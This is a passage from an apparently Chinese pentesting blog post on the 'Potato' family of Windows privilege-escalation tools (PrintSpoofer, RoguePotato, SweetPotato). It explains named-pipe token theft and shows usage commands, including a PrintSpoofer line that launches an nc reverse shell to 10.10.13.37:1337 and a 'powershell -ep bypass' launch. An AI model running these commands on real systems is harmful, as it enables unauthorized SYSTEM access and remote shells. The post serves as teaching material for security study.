<p>但当传递 <code>\\127.0.0.1/pipe/foo</code> 时，校验路径时会认为 <code>127.0.0.1/pipe/foo</code> 是主机名，随后在连接 named pipe 时会对参数做标准化，将 <code>/</code> 转化为 <code>\</code>，于是就会连接 <code>\\127.0.0.1\pipe\foo\pipe\spoolss</code>，攻击者就可以注册这个 named pipe 从而窃取 client 的 token。这个 POC 启动新进程是使用 <code>CreateProcessAsUser</code> 而不是 <code>CreateProcessWithToken</code>。</p>
<h3 id="42-实战">4.2 实战</h3>
<p>工具地址：<a href="https://github.com/itm4n/PrintSpoofer" target="_blank" rel="noopener noreffer">https://github.com/itm4n/PrintSpoofer</a></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131163859.gif-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131163859.gif-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131163859.gif-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131163859.gif-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131163859.gif-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131163859.gif-water_print" /></p>
<h4 id="421-派生一个-system-交互式-shell">4.2.1 派生一个 SYSTEM 交互式 shell</h4>
<p>适用于当前为交互式 shell 的状态下：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span><span class="lnt">9
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">C:<span class="se">\T</span>OOLS&gt;PrintSpoofer.exe -i -c cmd
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Found privilege: SeImpersonatePrivilege
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Named pipe listening...
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> CreateProcessAsUser<span class="o">()</span> OK
</span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.19613.1000<span class="o">]</span>
</span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2020</span> Microsoft Corporation. All rights reserved.
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">C:<span class="se">\W</span>INDOWS<span class="se">\s</span>ystem32&gt;whoami
</span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="422-派生一个-system-的进程">4.2.2 派生一个 SYSTEM 的进程</h4>
<p>适用于无交互式 shell，但是可以命令执行，使用 CS 上马或者 nc 反弹高权限 shell：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">C:<span class="se">\T</span>OOLS&gt;PrintSpoofer.exe -c <span class="s2">&#34;C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd&#34;</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Found privilege: SeImpersonatePrivilege
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Named pipe listening...
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> CreateProcessAsUser<span class="o">()</span> OK
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="423-桌面环境下派生-system-进程">4.2.3 桌面环境下派生 SYSTEM 进程</h4>
<p>在本地登录或者 RDP 下，先用 <code>qwinsta</code> 查看当前 ID 号，然后利用 POC：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131164420.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131164420.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131164420.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131164420.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131164420.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131164420.png-water_print" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">C:<span class="se">\T</span>OOLS&gt;PrintSpoofer.exe -d <span class="m">3</span> -c <span class="s2">&#34;powershell -ep bypass&#34;</span>
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Found privilege: SeImpersonatePrivilege
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Named pipe listening...
</span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> CreateProcessAsUser<span class="o">()</span> OK
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="5-roguepotato">5 RoguePotato</h2>
<h3 id="51-原理">5.1 原理</h3>
<p>这个也是利用了命名管道</p>
<p>微软修补后，高版本 Windows DCOM 解析器不允许 OBJREF 中的 DUALSTRINGARRAY 字段指定端口号。为了绕过这个限制并能做本地令牌协商，作者在一台远程主机上的 135 端口做流量转发，将其转回受害者本机端口，并写了一个恶意 RPC OXID 解析器。</p>
<h3 id="52-实战">5.2 实战</h3>
<p>工具地址：<a href="https://github.com/antonioCoco/RoguePotato" target="_blank" rel="noopener noreffer">https://github.com/antonioCoco/RoguePotato</a></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Mandatory args:
</span></span><span class="line"><span class="cl">-r remote_ip: ip of the remote machine to use as redirector
</span></span><span class="line"><span class="cl">-e commandline: commandline of the program to launch
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Optional args:
</span></span><span class="line"><span class="cl">-l listening_port: This will run the RogueOxidResolver locally on the specified port
</span></span><span class="line"><span class="cl">-c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
</span></span><span class="line"><span class="cl">-p pipename_placeholder: placeholder to be used in the pipe name creation (default: RoguePotato)
</span></span><span class="line"><span class="cl">-z : this flag will randomize the pipename_placeholder (don&#39;t use with -p)
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131165110.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131165110.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131165110.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131165110.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131165110.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210131165110.png-water_print" /></p>
<h2 id="6-sweetpotato">6 SweetPotato</h2>
<h3 id="61-原理">6.1 原理</h3>
<p>COM/WinRM/Spoolsv 的集合版，也就是 Juicy/PrintSpoofer 的集合版</p>
<h3 id="62-实战">6.2 实战</h3>
<p>工具地址：<a href="https://github.com/CCob/SweetPotato" target="_blank" rel="noopener noreffer">https://github.com/CCob/SweetPotato</a></p>
<p>参考：</p>
<ul>
<li><a href="https://foxglovesecurity.com/2016/01/16/hot-potato/" target="_blank" rel="noopener noreffer">https://foxglovesecurity.com/2016/01/16/hot-potato/</a></li>
<li><a href="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/" target="_blank" rel="noopener noreffer">https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/</a></li>
<li><a href="https://xz.aliyun.com/t/7776/#toc-4" target="_blank" rel="noopener noreffer">https://xz.aliyun.com/t/7776/#toc-4</a></li>
<li><a href="https://3gstudent.github.io/3gstudent.github.io/Windows%e6%9c%ac%e5%9c%b0%e6%8f%90%e6%9d%83%e5%b7%a5%e5%85%b7Juicy-Potato%e6%b5%8b%e8%af%95%e5%88%86%e6%9e%90/" target="_blank" rel="noopener noreffer">https://3gstudent.github.io/3gstudent.github.io/Windows本地提权工具Juicy-Potato测试分析/</a></li>
<li><a href="https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/" target="_blank" rel="noopener noreffer">https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/</a></li>
<li><a href="https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/" target="_blank" rel="noopener noreffer">https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/</a></li>
</ul>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2020-08-15</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2020/08/potato%E5%AE%B6%E6%97%8F%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90/" data-title="Potato 家族提权分析"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2020/08/potato%E5%AE%B6%E6%97%8F%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90/" data-title="Potato 家族提权分析"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2020/08/potato%E5%AE%B6%E6%97%8F%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90/" data-title="Potato 家族提权分析"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>,&nbsp;<a href="/tags/%E6%8F%90%E6%9D%83/">提权</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2020/07/apache-dubbo-provider%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9Ecve-2020-1948/" class="prev" rel="prev" title="Apache Dubbo Provider反序列化漏洞(CVE-2020-1948)"><i class="fas fa-angle-left fa-fw"></i>Apache Dubbo Provider反序列化漏洞(CVE-2020-1948)</a>
            <a href="/2020/08/%E5%86%85%E7%BD%91%E9%9A%A7%E9%81%93%E7%A9%BF%E9%80%8F/" class="next" rel="next" title="内网隧道穿透">内网隧道穿透<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
